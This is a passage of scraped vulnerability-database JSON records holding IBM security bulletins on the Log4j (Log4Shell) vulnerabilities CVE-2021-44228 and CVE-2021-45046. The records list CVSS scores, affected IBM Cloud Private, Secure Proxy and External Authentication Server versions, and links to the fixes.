CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSBS6K\",\"label\":\"IBM Cloud Private\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"all\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T12:22:10", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Cloud Private (CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-01-27T12:22:10", "id": "6CC386F9299ECFE5F62C9D0954CED9917B32A3DFEB8BC98C8212D83DD7B53DF6", "href": "https://www.ibm.com/support/pages/node/6529452", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-25T23:35:27", "description": "## Summary\n\nAn Apache Log4j vulnerability allowing a remote attacker to execute 
arbitrary code on the system was addressed by IBM Secure Proxy.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Secure Proxy| 3.4.3.2 \nIBM Secure Proxy| 6.0.2 \nIBM Secure Proxy| 6.0.3 \n \n\n\n## Remediation/Fixes\n\n**Product**| **VRMF**| **iFix**| **Remediation** \n---|---|---|--- \nIBM Secure Proxy| 6.0.3| iFix 01 Plus| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Secure Proxy| 6.0.2| iFix 04 Plus| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \nIBM Sterling Secure Proxy| 3.4.3.2| iFix 13 Plus| [Fix Central - 3432](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=3.4.3.2&platform=All&function=all> \"Fix Central - 3432\" ) \n \nThe fixes above 
supply Apache Log4j 2.16.0 which remediates both CVE-2021-44228 and CVE-2021-45046. The Fix Central - 6030 link also points to a fix called SSP-log4j-2.16.0-jars-for-CVE-2021-45046 which supplies the jars and instructions to replace them. \n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PNW\",\"label\":\"IBM Sterling Secure Proxy\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"6.0.3, 6.0.2, 3.4.3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T04:01:02", "type": "ibm", "title": "Security Bulletin: Apache Log4j Vulnerability Affects IBM Secure Proxy (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-21T04:01:02", "id": "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B", "href": 
"https://www.ibm.com/support/pages/node/6528796", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-25T23:39:29", "description": "## Summary\n\nAn Apache Log4j vulnerability allowing a remote attacker to execute arbitraty code on the system was addressed by IBM Secure External Authentication Server.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Secure External Authentication Server| 6.0.3 \nIBM Secure External Authentication Server| 6.0.2 \n \n\n\n## Remediation/Fixes\n\n**Product**| **VRMF**| **iFix**| **Remediation** \n---|---|---|--- \nIBM Secure External Authentication Server| 6.0.3| iFix 01 Plus| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling External Authentication Server| 6.0.2| iFix 04 Plus| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \nThe fixes above supply Apache Log4j 2.16.0 which remediates both CVE-2021-44228 and CVE-2021-45046. The link [Fix Central SSP 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central SSP 6030\" ) also points to a fix called SSP-log4j-2.16.0-jars-for-CVE-2021-45046 which supplies the jars and instructions to replace them on SSP or SEAS. 
\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PNW\",\"label\":\"IBM Sterling Secure Proxy\"},\"Component\":\"Sterling External Authentication Server\",\"Platform\":[{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"6.0.3, 6.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T03:55:44", "type": "ibm", "title": "Security Bulletin: Apache Log4j Vulnerability Affects IBM Secure External Authentication Server (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-21T03:55:44", "id": 
"18A5E6C2581806177DE446AE26FCBC2EBB616C29B40041253F318FF51CE1AFB5", "href": "https://www.ibm.com/support/pages/node/6528794", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-25T23:39:38", "description": "## Summary\n\nApache Log4j vulnerability CVE-2021-45046 was addressed by IBM Secure External Authentication Server. Customers are encourages to take action and apply the fix below. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Product(s)**| **Version(s)** \n---|--- \nIBM Secure External Authentication Server| 6.0.3 \nIBM Secure External Authentication Server| 6.0.2 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by applying the appropriate fix below.**\n\n**Product**| **VRMF**| **iFix**| **Remediation** \n---|---|---|--- \nIBM Secure External Authentication Server| 6.0.3| iFix 01 Plus| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling External Authentication Server| 6.0.2| iFix 04 Plus| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \n \nThe fixes above supply Apache Log4j 2.16.0 which remediates both CVE-2021-44228 and CVE-2021-45046. 
The [Fix Central - SSP 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - SSP 6030\" ) link also points to a fix called SSP-log4j-2.16.0-jars-for-CVE-2021-45046 which supplies the jars and instructions to replace them.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PNW\",\"label\":\"IBM Sterling Secure Proxy\"},\"Component\":\"Sterling External Authentication Server\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"6.0.3, 6.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T21:23:06", "type": "ibm", "title": "Security Bulletin: Apache Log4j Vulnerability Affects IBM Secure External Authentication Server (CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-21T21:23:06", "id": 
"BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "href": "https://www.ibm.com/support/pages/node/6529538", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-25T23:34:53", "description": "## Summary\n\nAn Apache Log4j vulnerability allowing a remote attacker to execute arbitrary code on the system was addressed by IBM Secure Proxy.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Secure Proxy| 3.4.3.2 \nIBM Secure Proxy| 6.0.2 \nIBM Secure Proxy| 6.0.3 \n \n\n\n## Remediation/Fixes\n\n**Product**| **VRMF**| **iFix**| **Remediation** \n---|---|---|--- \nIBM Secure Proxy| 6.0.3| iFix 01 Plus| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Secure Proxy| 6.0.2| iFix 04 Plus| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \nIBM Sterling Secure Proxy| 3.4.3.2| iFix 13 Plus| [Fix Central - 3432](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=3.4.3.2&platform=All&function=all> \"Fix Central - 3432\" ) \n \nThe fixes above supply Apache Log4j 2.16.0 which remediates both CVE-2021-44228 and CVE-2021-45046. The Fix Central - 6030 link also points to a fix called SSP-log4j-2.16.0-jars-for-CVE-2021-45046 which supplies the jars and instructions to replace them. 
\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PNW\",\"label\":\"IBM Sterling Secure Proxy\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"6.0.3,6.0.2,3.4.3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T21:33:12", "type": "ibm", "title": "Security Bulletin: Apache Log4j Vulnerability Affects IBM Secure Proxy (CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-21T21:33:12", "id": "B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA", "href": 
"https://www.ibm.com/support/pages/node/6529556", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-28T23:39:40", "description": "## Summary\n\nThere is a vulnerability in the Apache Log4j open source library. The library is used by Elasticsearch, a dependency of IBM Cloud Private, for logging messages to files. This bulletin identifies the security fixes to apply to address the Log4Shell vulnerability (CVE-2021-44228). \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Cloud Private| 3.1.0 \nIBM Cloud Private| 3.1.1 \nIBM Cloud Private| 3.1.2 \nIBM Cloud Private| 3.2.0 \nIBM Cloud Private| 3.2.1 CD \nIBM Cloud Private| 3.2.2 CD \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\nThe recommended solution involves the IBM Cloud Private ibm-icplogging component. 
It is recommended that you follow the instructions for the component in the links listed below:\n\nFor IBM Cloud Private 3.1.0: [IBM Cloud Private 3.1.0 Patch](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.1.0-build600961-51486&includeSupersedes=0> \"IBM Cloud Private 3.1.0 Patch\" )\n\nFor IBM Cloud Private 3.1.1: [IBM Cloud Private 3.1.1 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.1.1-build600916-51406&includeSupersedes=0> \"IBM Cloud Private 3.1.1 Patch\" )\n\nFor IBM Cloud Private 3.1.2: [IBM Cloud Private 3.1.2 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.1.2-build600891-51342&includeSupersedes=0> \"IBM Cloud Private 3.1.2 Patch\" )\n\nFor IBM Cloud Private 3.2.0: [IBM Cloud Private 3.2.0 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.0-build600917-51405&includeSupersedes=0> \"IBM Cloud Private 3.2.0 Patch\" )\n\nFor IBM Cloud Private 3.2.1: [IBM Cloud Private 3.2.1 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.1-build600890-51324&includeSupersedes=0> \"IBM Cloud Private 3.2.1 Patch\" )\n\nFor IBM Cloud Private 3.2.2: [IBM Cloud Private 3.2.2 Patch](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.2-build600889-51343&includeSupersedes=0> \"IBM Cloud Private 3.2.2 Patch\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< 
